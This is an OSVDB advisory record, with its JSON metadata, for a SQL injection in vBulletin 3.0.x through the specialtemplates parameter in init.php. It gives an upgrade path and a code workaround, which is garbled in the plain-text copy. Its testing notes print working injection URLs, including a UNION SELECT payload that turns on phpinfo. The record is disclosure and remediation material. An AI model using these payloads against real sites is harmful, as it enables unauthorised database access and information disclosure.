ID OSVDB:12702 Type osvdb Reporter al3ndaleeb(al3ndaleeb@uk2.net) Modified 2005-01-02T07:09:55
Description
Vulnerability Description
vBulletin contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the specialtemplates variable in the init.php file is not verified properly and will allow an attacker to inject or manipulate SQL queries.
Solution Description
Upgrade to version 3.0.5 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Open init.php file and search for:
$datastoretemp = $DB_site->query("
SELECT title, data
FROM " . TABLE_PREFIX . "datastore
WHERE title IN ('" . implode("', '", $specialtemplates) . "')
");
unset($specials, $specialtemplates);
$datastoretemp = $DB_site->query("
SELECT title, data
FROM " . TABLE_PREFIX . "datastore
WHERE title IN ('" . implode("', '", $specialtemplate) . "')
");
vBulletin contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the specialtemplates variable in the init.php file is not verified properly and will allow an attacker to inject or manipulate SQL queries.
Manual Testing Notes
An exploit example:
http://[victim]/forum/global.php?specialtemplates=al3ndaleeb')
http://[victim]/forum/global.php?do=phpinfo&specialtemplates[]=al3ndaleeb')
UNION SELECT concat('options') as title,concat('a:4:{s:15:"templateversion";s:5:"3.0.3";s:12:"allowphpinfo";s:1:"1";s:10:"languageid";s:1:"1";s:7:"styleid";s:1:"1";}') as data/*
References:
Vendor URL: http://www.vbulletin.com/
Vendor Specific Solution URL: http://www.vbulletin.com/forum/showthread.php?postid=791268
Other Advisory URL: http://beyonce.beyondsecurity.com/unixfocus/5HP050KEKM.html
{"id": "OSVDB:12702", "bulletinFamily": "software", "title": "vBulletin init.php SQL Injection", "description": "## Vulnerability Description\nvBulletin contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the specialtemplates variable in the init.php file is not verified properly and will allow an attacker to inject or manipulate SQL queries.\n## Solution Description\nUpgrade to version 3.0.5 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Open init.php file and search for:\n\n$datastoretemp = $DB_site->query(\"\nSELECT title, data\nFROM \" . TABLE_PREFIX . \"datastore\nWHERE title IN ('\" . implode(\"', '\", $specialtemplates) . \"')\n\");\nunset($specials, $specialtemplates);\n\nSo, replace with these lines:\n\nif(!is_array($specialtemplates))\n exit;\n\n$specialtemplate = array();\nforeach ($specialtemplates AS $arrykey => $arryval) {\n $specialtemplate[] = addslashes($specialtemplates[\"$arrykey\"]);\n}\n\n$datastoretemp = $DB_site->query(\"\nSELECT title, data\nFROM \" . TABLE_PREFIX . \"datastore\nWHERE title IN ('\" . implode(\"', '\", $specialtemplate) . \"')\n\");\n\nunset($specials, $specialtemplates, $specialtemplate);\n## Short Description\nvBulletin contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the specialtemplates variable in the init.php file is not verified properly and will allow an attacker to inject or manipulate SQL queries.\n## Manual Testing Notes\nAn exploit example:\n\nhttp://[victim]/forum/global.php?specialtemplates=al3ndaleeb')\nhttp://[victim]/forum/global.php?do=phpinfo&specialtemplates[]=al3ndaleeb')\nUNION SELECT concat('options') as title,concat('a:4:{s:15:\"templateversion\";s:5:\"3.0.3\";s:12:\"allowphpinfo\";s:1:\"1\";s:10:\"languageid\";s:1:\"1\";s:7:\"styleid\";s:1:\"1\";}') as data/*\n## References:\nVendor URL: http://www.vbulletin.com/\nVendor Specific Solution URL: http://www.vbulletin.com/forum/showthread.php?postid=791268\nOther Advisory URL: http://beyonce.beyondsecurity.com/unixfocus/5HP050KEKM.html\n", "published": "2005-01-02T07:09:55", "modified": "2005-01-02T07:09:55", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/osvdb/OSVDB:12702", "reporter": "al3ndaleeb(al3ndaleeb@uk2.net)", "references": [], "cvelist": [], "type": "osvdb", "lastseen": "2017-04-28T13:20:08", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "21a65aafa0a84ba0e5630b5a71deee47"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "6595ad8df22c82c8936b0e367316b0bd"}, {"key": "href", "hash": "26c21e0b6e3c0ce6f6ff7408e5428bbb"}, {"key": "modified", "hash": "a9e499b5f57d711730c732a058c88263"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "a9e499b5f57d711730c732a058c88263"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "bc2eeac041d544aeea144b2b03bb458f"}, {"key": "title", "hash": "baac558fb8595896eee8829b5bcac87b"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "hash": "a85f49b81a1b07c0e893f447afb82da10504eb8b1817cce72b3979477e7acd29", "viewCount": 0, "objectVersion": "1.2", "affectedSoftware": [{"name": "vBulletin", "operator": "eq", "version": "3.0.0"}, {"name": "vBulletin", "operator": "eq", "version": "3.0.2"}, {"name": "vBulletin", "operator": "eq", "version": "3.0.1"}, {"name": "vBulletin", "operator": "eq", "version": "3.0.3"}, {"name": "vBulletin", "operator": "eq", "version": "3.0.4"}], "enchantments": {"vulnersScore": 7.5}}